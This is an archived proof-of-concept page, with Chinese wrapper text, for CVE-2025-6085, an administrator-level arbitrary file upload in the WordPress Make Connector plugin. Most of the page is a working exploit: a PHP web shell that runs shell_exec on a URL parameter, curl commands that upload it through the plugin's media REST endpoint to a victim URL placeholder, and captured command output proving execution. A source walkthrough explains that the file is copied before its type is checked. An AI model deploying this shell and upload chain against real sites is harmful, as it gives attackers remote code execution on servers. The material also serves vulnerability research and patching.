关联漏洞
标题:
WordPress plugin Make Connector 安全漏洞
(CVE-2025-6085)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Make Connector 1.5.10及之前版本存在安全漏洞,该漏洞源于文件类型验证配置不当,可能导致任意文件上传和远程代码执行。
描述
Make Connector <= 1.5.10 - Authenticated (Administrator+) Arbitrary File Upload
介绍
# Make Connector <= 1.5.10 - Authenticated (Admin+) Arbitrary File Upload
The [Make Connector](https://wordpress.org/plugins/integromat-connector/) plugin does not sanitize the file types in its REST API media uploads, allowing administrators or above to upload arbitrary files and potentially gain code execution on the server.
## TL;DR Exploits
```bash
cat << 'EOF' > shello.php
<?php
// Silence is golden
if (!empty($_GET['cmd'])) {
echo "<pre>".shell_exec($_GET["cmd"])."</pre>";
}
?>
EOF
curl -k -X POST https://lab1.hacker/wp-json/wp/v2/media \
-H "IWC-API-KEY: YOURFRIENDLYKEYHERE" \
-F "file=@shello.php" \
-F "title=Hacker World" \
-F "description=A test file" \
-F "caption=Hacker Caption" \
```
Leveraging the shell once it's in the uploads folder:
```bash
curl -k https://lab1.hacker/wp-content/uploads/2025/04/shello.php\?cmd\=ip%20addr
<pre>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:5b:34:2f brd ff:ff:ff:ff:ff:ff
altname enp0s3
inet 10.0.2.15/24 metric 100 brd 10.0.2.255 scope global dynamic eth0
valid_lft 67461sec preferred_lft 67461sec
inet6 fd17:625c:f037:2:a00:27ff:fe5b:342f/64 scope global dynamic mngtmpaddr noprefixroute
valid_lft 86201sec preferred_lft 14201sec
inet6 fe80::a00:27ff:fe5b:342f/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:39:ea:eb brd ff:ff:ff:ff:ff:ff
altname enp0s8
inet 192.168.56.56/24 brd 192.168.56.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fe39:eaeb/64 scope link
valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:bd:e1:95:26 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
</pre>
```
## Details
The `/wp-content/integromat-connector/class/class-rest-request.php` file's `dispatch()` function will call `self::upload_media();` on line [24](https://plugins.trac.wordpress.org/browser/integromat-connector/trunk/class/class-rest-request.php#L24). This `upload_media()` function copies the uploaded file to a browsable directory `copy( realpath( $_FILES['file']['tmp_name'] ), $media_file_source );` on line [74](https://plugins.trac.wordpress.org/browser/integromat-connector/trunk/class/class-rest-request.php#L74), prior to checking the allowed mime types, which it does on lines [90-95](https://plugins.trac.wordpress.org/browser/integromat-connector/trunk/class/class-rest-request.php#L90-95)
Vulnerable snipped from `class-rest-reques.php`:
```php
66 if ( (int) $_FILES['file']['size'] === 0 ) {
67 Rest_Response::render_error( 500, 'The uploaded file exceeds the upload_max_filesize directive in php.ini.', 'rest_upload_unknown_error' );
68 }
69
70 if ( (int) $_FILES['file']['error'] > 0 ) {
71 Rest_Response::render_error( 500, 'An error has occured when uploading file to the server.', 'rest_upload_unknown_error' );
72 }
73
74 copy( realpath( $_FILES['file']['tmp_name'] ), $media_file_source );
75
76 $title = isset( $_REQUEST['title'] ) ? sanitize_title( $_REQUEST['title'] ) : '';
77 $description = isset( $_REQUEST['description'] ) ? sanitize_text_field( $_REQUEST['description'] ) : '';
78 $caption = isset( $_REQUEST['caption'] ) ? sanitize_text_field( $_REQUEST['caption'] ) : '';
79 $alt_text = isset( $_REQUEST['alt_text'] ) ? sanitize_text_field( $_REQUEST['alt_text'] ) : '';
80 $post_id = isset( $_REQUEST['post'] ) ? (int) $_REQUEST['post'] : '';
81
82 $upload_dir = wp_upload_dir();
83 $filename = basename( $media_file_source );
84 if ( wp_mkdir_p( $upload_dir['path'] ) ) {
85 $file = $upload_dir['path'] . '/' . $filename;
86 } else {
87 $file = $upload_dir['basedir'] . '/' . $filename;
88 }
89
90 $wp_file_type = wp_check_filetype( $filename, null );
91 $allowed_types = get_allowed_mime_types();
92
93 if ( ! in_array( $wp_file_type['type'], $allowed_types ) ) {
94 Rest_Response::render_error( 500, 'Sorry, this file type is not permitted for security reasons.', 'rest_upload_unknown_error' );
95 }
```
## Manual Reproduction
1. Login to the admin panel and navigate to the `Make` plugin's settings, and copy the API key.

2. Make a dirty web shell, or bring your own if you'd like:
```bash
cat << 'EOF' > shello.php
<?php
// Silence is golden
if (!empty($_GET['cmd'])) {
echo "<pre>".shell_exec($_GET["cmd"])."</pre>";
}
?>
EOF
```
2. Execute the following curl command to hit the plugin's media REST endpoint.
```bash
curl -k -X POST \
https://VICTIMURLHERE/wp-json/wp/v2/media \
-H "IWC-API-KEY: cjusksft1dwcoq43lyy6a6lf9tb6qc63" \
-F "file=@shello.php" \
-F "title=Hacker World" \
-F "description=A test file" \
-F "caption=Hacker Caption" \
-F "alt_text=Hacker Alt Text"
```
3. You will see a json response like below, but that's OK because our file already got moved :)
```json
{
"code": "rest_upload_unknown_error",
"message": "Sorry, this file type is not permitted for security reasons.",
"data": {
"status": 500
}
}
```
4. Naviate to the webshell located at `https://lab1.hacker/wp-content/uploads/2025/04/shello.php?cmd=ip%20addr`.
文件快照
[4.0K] /data/pocs/063abea9172eed1dfdf97dff9ef03420bcbb97e4
├── [4.0K] images
│ └── [ 77K] 1.png
└── [6.1K] README.md
1 directory, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。